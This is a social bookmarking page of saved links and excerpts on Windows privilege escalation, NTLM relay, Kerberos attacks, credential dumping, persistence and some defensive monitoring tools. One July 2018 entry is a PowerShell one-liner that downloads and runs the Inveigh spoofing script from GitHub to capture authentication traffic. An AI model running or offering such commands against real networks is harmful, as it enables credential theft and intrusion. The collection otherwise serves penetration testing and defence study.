whip_lash + security   592

Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
NTLM relay from the local “NT AUTHORITY\SYSTEM” (we will just call it SYSTEM for brevity) account back to some other system service has been the theme for the Potato privilege escalation exploits. The first step is to trick the SYSTEM account into performing authentication to some TCP listener we control.

In the original Hot Potato exploit, we did some complex magic with NBNS spoofing, WPAD, and Windows Update services to trick it into authenticating to us over HTTP. For more information, see the original blog post.

Today, we’ll be discussing another method to accomplish the same end goal which James Forshaw discussed here. We’ll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.
security  pentest  windows  privesc  privilegeescalation 
27 days ago by whip_lash
Juicy Potato (abusing the golden privileges) | juicy-potato
If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

It’s nearly impossible to prevent the abuse of all these COM Servers. You could think to modify the permissions of these objects via DCOMCNFG but good luck, this is gonna be challenging.

The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.
pentest  windows  privilegeescalation  security 
27 days ago by whip_lash
From Kekeo to Rubeus – Posts By SpecterOps Team Members
Today I’m releasing Rubeus, the start of a C# reimplementation of some (not all) of Kekeo’s functionality. I’ve wanted to dive deeper into Kerberos structures and exchanges for a while in order to better understand the entire system, and this project provided the perfect excuse to jump right in.
kerberos  activedirectory  security  pentest  tool 
27 days ago by whip_lash
FuzzySecurity | Windows Userland Persistence Fundamentals
This tutorial will cover several techniques that can be used to gain persistent access to Windows machines. Usually this doesn't enter into play during a pentest (with the exception of red team engagements) as there is no benefit to adding it to the scope of the project. That is not to say it is not an interesting subject, both from a defensive and offensive perspective.
persistence  windows  pentest  redteam  security 
4 weeks ago by whip_lash
The pitfalls of using ssh-agent, or how to use an agent safely
I probably sound like a broken record by now, but something like ssh-ident allows you to keep different keys in different agents, easily, while loading agents and keys on demand, keep your identities separated, and easily set a timeout while reloading all keys as necessary.
linux  security  ssh 
6 weeks ago by whip_lash
Script Get All AD Users Logon History with their Logged on Computers (with IPs) & OUs
This script will list the AD users' logon information with their logged-on computers by inspecting the Kerberos TGT request events (EventID 4768) from domain controllers. Not only the user account name is fetched, but also the user's OU path and computer accounts are retrieved. You can also list the history of last logged-on users. In environments where Exchange Servers are used, the Exchange servers' authentication requests for users will also be logged, since they also use EventID 4768 for TGT requests. You can also export the result to CSV file format. PowerShell version 3.0 is needed to use the script.
You can define the following parameters to suit your needs:
ad  security  powershell  Scripting 
7 weeks ago by whip_lash
AnonOpsecPrivacy - InfoSec Reference
Colossal InfoSec reference on every subject imaginable
security  pentest 
8 weeks ago by whip_lash
Rotten Potato | Penetration Testing Lab
However there is a technique which can be used that tries to trick the “NT Authority\System” account to negotiate and authenticate via NTLM locally so the token for the “NT Authority\System” account would become available and therefore privilege escalation possible. This technique is called Rotten Potato and it was introduced in DerbyCon 2016 by Stephen Breen and Chris Mallz.
windows  privesc  privilegeescalation  pentest  security 
9 weeks ago by whip_lash
GitHub - quentinhardy/odat: ODAT: Oracle Database Attacking Tool
ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
oracle  database  pentest  security  tool 
9 weeks ago by whip_lash
NSA Cracked Open Encrypted Networks of Russian Airlines, Al Jazeera, and Other “High Potential” Targets
The NSA’s ability to crack into sensitive VPNs belonging to large organizations, all the way back in 2006, raises broader questions about the security of such networks. Many consumers pay for access to VPNs in order to mask the origin of their internet traffic from the sites they visit, hide their surfing habits from their internet service providers, and to protect against eavesdroppers on public Wi-Fi networks.
security  nsa  vpn 
9 weeks ago by whip_lash
Veritas® Traveller's Doorstop - Lee Valley Tools
To use it, you just slide the wedge under the door and elevate it with the screw until the door is solidly wedged. Anyone attempting entry causes the door to wedge tighter in the frame while the pointed screw keeps the wedge from shifting. The screw can be used with concrete subfloors as well as the traditional carpet-covered subfloors.

It does not damage carpeting unless there is an attempted forced entry; it then penetrates the subfloor as the pressure on the wedge increases. But then, which would you prefer, a dent in the subfloor or an unwanted visitor? The lever handle gives you substantial mechanical advantage, making it easy to turn the screw.
security  travel 
9 weeks ago by whip_lash
michenriksen/gitrob: Reconnaissance tool for GitHub organizations
Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files.
git  github  osint  security 
10 weeks ago by whip_lash
The default OpenSSH key encryption is worse than plaintext
That’s a fair argument to say that standard password-encrypted keys are about as good as plaintext: the encryption is ineffective. But I made a stronger statement: it’s worse. The argument there is simple: an SSH key password is unlikely to be managed by a password manager: instead it’s something you remember. If you remember it, you probably reused it somewhere. Perhaps it’s even your device password.
encryption  security  ssh 
11 weeks ago by whip_lash
JSON Web Tokens - jwt.io
JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.

JWT.IO allows you to decode, verify and generate JWT.
authentication  javascript  json  security  webapp  pentest 
11 weeks ago by whip_lash
GitHub - pentestmonkey/pysecdump: Python-based tool to dump security information from Windows systems
pysecdump is a python tool to extract various credentials and secrets from running Windows systems. It currently extracts:

LM and NT hashes (SYSKEY protected)
Cached domain passwords
LSA secrets
Secrets from Credential Manager (only some)
pentest  security  tool 
11 weeks ago by whip_lash
There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies development, but we need to stay updated on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10, and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect the use of versions with known vulnerabilities.
javascript  security  pentest  webapp 
12 weeks ago by whip_lash
Removing sensitive data from a repository - User Documentation
If you commit sensitive data, such as a password or SSH key into a Git repository, you can remove it from the history. To entirely remove unwanted files from a repository's history you can use either the git filter-branch command or the BFG Repo-Cleaner.
git  github  security 
12 weeks ago by whip_lash
GitHub - s0md3v/Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
Photon is a lightning fast web crawler which extracts URLs, files, intel & endpoints from a target.

160 requests per second while extensive data extraction is just another day for Photon!
python  security  tools  web  recon  pentest 
12 weeks ago by whip_lash
The project collects legitimate functions of Unix binaries that can be abused to get the f**k out of (break out of) restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate other post-exploitation tasks. See the full list of functions.

This was inspired by the LOLBins project for Windows.
linux  pentesting  hacking  security  shell 
july 2018 by whip_lash
gargoyle, a memory scanning evasion technique
gargoyle is a technique for hiding all of a program’s executable code in non-executable memory. At some programmer-defined interval, gargoyle will wake up and, with some ROP trickery, mark itself executable and do some work:
security  memory  gargoyle 
july 2018 by whip_lash
hacksysteam/HackSysExtremeVulnerableDriver: HackSys Extreme Vulnerable Windows Driver
HackSys Extreme Vulnerable Driver is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at the kernel level.
security  windows  kernel 
july 2018 by whip_lash
clymb3r/KdExploitMe: A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.
A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. Knowing how to exploit security issues allows security testers to prove that bugs are exploitable which can be used to convince developers to fix bugs. While these techniques can be used for evil, I have written this driver in the hopes that you will use this knowledge for good.
kernel  security 
july 2018 by whip_lash
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"
hacking  pentest  security 
july 2018 by whip_lash
Categorizing and Enriching Security Events in an ELK with the Help of Sysmon and ATT&CK
Thanks to the recent update to Sysmon (Version 8.0), tagging Sysmon rules is now possible, and makes things much easier to add extra metadata to Sysmon events.
sysmon  security  monitoring 
july 2018 by whip_lash
SANS Penetration Testing | Pen Test Poster: "White Board" - Bash - Useful IPv6 Pivot | SANS Institute
IPv6 brings a lot of changes, many of which are relevant from a security perspective. It also brings with it unique potential for added vulnerable space that can be leveraged in network compromises. IPv6 is not well understood and prone to misconfiguration. During security assessments, I've seen these settings result in critical security vulnerabilities, including a firewall configured to provide carte blanche access to the entire network for all traffic using IPv6. Operating in IPv6 and taking advantage of these weaknesses is a key opportunity for pentesters.
ipv6  pentest  security 
july 2018 by whip_lash
Car Hacking: The definitive source
Instead of buying books or paying exorbitant amounts of money to learn about car hacking, we (Charlie Miller and Chris Valasek) decided to publish all our tools, data, research notes, and papers to everyone for FREE! Feel free to reach out if you have any questions. If you're nice enough we may actually send you one of our IDBs ;)
car  hacking  security 
july 2018 by whip_lash
Netflix/security_monkey: Security Monkey
Security Monkey monitors your AWS and GCP accounts for policy changes and alerts on insecure configurations. Support is available for OpenStack public and private clouds. Security Monkey can also watch and monitor your GitHub organizations, teams, and repositories.
aws  devops  github  monitoring  security 
july 2018 by whip_lash
Hexacorn | Blog
If you run ‘powershell <0x2000 spaces> calc’ you will spawn Windows Calculator.

What will you see in the logs?

obfuscation  logging  pentest  windows  security 
june 2018 by whip_lash
Bypassing SQL Server Logon Trigger Restrictions
Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties.
database  pentest  security  mssql  MySQL  sql 
june 2018 by whip_lash
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
This article is going to be talking about what you can do with Net-NTLM in modern windows environments.
hash  ntlm  relay  windows  pentest  security 
june 2018 by whip_lash
SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec (at http://pen-testing.sans.org/blog/2013/03/27/psexec-python-rocks). It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET!
impacket  python  security  smb  relay  ntlm  hash  script  pentest 
june 2018 by whip_lash
calebmadrigal/trackerjacker: Like nmap for mapping wifi networks you're not connected to, plus device tracking
Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.
network  python  security  wifi  wireless  pentest  github 
june 2018 by whip_lash
ufrisk/pcileech: Direct Memory Access (DMA) Attack Software
PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system.

PCILeech works without hardware together with memory dump files and the Windows 7/2008R2 x64 Total Meltdown / CVE-2018-1038 vulnerability.
memory  security  github  hardware 
june 2018 by whip_lash
Homas/ioc2rpz: ioc2rpz is a place where threat intelligence meets DNS.
ioc2rpz transforms IOC feeds into response policy zones (RPZ). You can mix feeds to generate a single RPZ or multiple RPZs. Trusted domains and IPs can be whitelisted. ioc2rpz supports expiration of indicators and accordingly rebuilds zones.
dns  security  github 
june 2018 by whip_lash
Cymmetria/honeycomb: An extensible honeypot framework
Honeycomb is an open-source honeypot framework created by Cymmetria.

Honeycomb allows running honeypots with various integrations from a public library of plugins from https://github.com/Cymmetria/honeycomb_plugins

Writing new honeypot services and integrations for honeycomb is super easy! See the plugins repo for more info.
honeypot  security  github 
june 2018 by whip_lash
CHIRON is a home analytics system based on the ELK stack combined with the machine learning threat detection framework AKTAION. CHIRON parses and displays data from P0f, Nmap, and BRO IDS. CHIRON is designed for home use and will give great visibility into home internet devices (IoT, computers, cellphones, tablets, etc.).
github  lab  security  securityonion 
june 2018 by whip_lash
sense-of-security/ADRecon: ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.
ADRecon is a tool which extracts various artifacts (as highlighted below) out of an AD environment in a specially formatted Microsoft Excel report that includes summary views with metrics to facilitate analysis.
security  pentest  activedirectory  github 
june 2018 by whip_lash
SANS Penetration Testing | Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks | SANS Institute
Favorite tweet:

SANS | #PenTest Blog

Modern Web App Pen Testing Part 2, Hash Length Extension Attacks
by @adriendb (SEC642)

Blog: https://t.co/8TR2Z7OKYu pic.twitter.com/3YA3ncesym

— SANS Pen Test (@SANSPenTest) June 28, 2018
hashextension  hash  webapp  pentest  security 
june 2018 by whip_lash
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI – Security Stuff
Learning from these incidents, and the requirements inherent to them (ability to deploy tools and get data rapidly, use only built-in tools, has to be usable and deployable by people who probably haven't slept in a week), I developed an Incident Response dashboard that I liked so much I personally used it to "hunt" on all the engagements in the later part of my Incident Response Consultant tenure. Many of the customers liked it so much that they have kept it in their environments to use for proactive threat hunting and log analysis.
defense  dfir  security  windows 
june 2018 by whip_lash
Microsoft COM for Windows - Privilege Escalation
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
privesc  windows  pentest  exploit  security 
june 2018 by whip_lash
Apply MITRE’s ‘ATT&CK’ Model to Check Your Defenses | McAfee Blogs
In this post, we highlighted one approach and application of the ATT&CK model. There are many ways to apply it for red teaming, threat hunting, and other tasks. At McAfee we embrace the model and are applying it to different levels and purposes in our organization. We are not only using it but also contribute to the model by describing newly discovered techniques used by adversaries.
pentest  security 
june 2018 by whip_lash
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
The "executive summary" version of a Golden Ticket is that if you can obtain one of the encryption keys used by the krbtgt account for an Active Directory domain, Mimikatz 2.0 will allow you to forge arbitrary Kerberos authentication tickets for that domain. Those keys are not easily-obtained — unless someone has left an NTDS.DIT backup lying around, it probably requires access to a domain admin account's credentials — so the Golden Ticket functionality is sort of like the "New Game+" mode in the Silent Hill series: you've already won, and now you can play through again as an unstoppable juggernaut with a laser pistol and/or chainsaw.
activedirectory  mimikatz  goldenticket  pentest  security 
june 2018 by whip_lash
One-Lin3r v1.1 - Gives You One-Liners That Aids In Penetration Testing Operations - KitPloit - PenTest Tools for your Security Arsenal ☣
Favorite tweet:

#OneLin3r v1.1 - Gives You One-Liners That Aids In Penetration #Testing Operations https://t.co/AWvpLnt1ND pic.twitter.com/74zGjoV9Ve

— ☣ The Hacker Tools (@KitPloit) June 14, 2018
pentest  security  tool 
june 2018 by whip_lash
Pentester's Windows NTFS Tricks Collection | SEC Consult
Moreover, it’s possible that an administrator or a program configures such permissions and assumes that users are really not allowed to create folders in it.

This ACL can be bypassed as soon as a user can create files. Adding “::$INDEX_ALLOCATION” to the end of a filename will create a folder instead of a file and Windows currently doesn’t include a check for this corner case.

As shown above, a directory was successfully created and the user can create arbitrary files or folders in this directory (which can lead to privilege escalation if an administrator/program assumes that this is not possible because of the missing permissions).
ntfs  windows  privesc  privilegeescalation  security  whitelist-evasion 
june 2018 by whip_lash